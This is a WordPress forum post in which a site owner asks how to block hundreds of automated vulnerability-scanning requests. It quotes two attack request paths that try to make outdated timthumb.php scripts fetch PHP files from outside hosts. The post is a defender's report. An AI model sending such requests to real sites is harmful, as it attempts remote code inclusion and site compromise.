WordPress.org

Ready to get started?Download WordPress

Forums

How to block the bucket loads of vulnerability requests to my domain (1 post)

  1. uberpiglet
    Member
    Posted 1 year ago #

    I recently installed a plugin on my self hosted WordPress blog to manage 404 errors, and to clean up issues GWMT's was finding from deleted pages on my site. What I wasn't expecting to see was literally 100's (about 800 in 24 hours) of requests to my domain that are landing as 404 errors, that are blatant efforts to find vulnerabilities in my install. This sort of thing:
    /wp-content/themes/yamidoo_pro/scripts/timthumb.php?src=http%3A%2F%2Fflickr.com.94pianyidian.com%2Fbad.php

    /wp-content/themes/arthemia/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.gonulcila.com%2Fcilik.php

    Now this looks to me like someone running an automated project, using proxies by the range of ips the requests are coming from...who is looking for sites still running themes with the outdated timthumb.php file. Any way to block this rubbish? My site has been hacked a few times, so now I pay to have it secured and monitored by sucuri.

    Cheers

Topic Closed

This topic has been closed to new replies.

About this Topic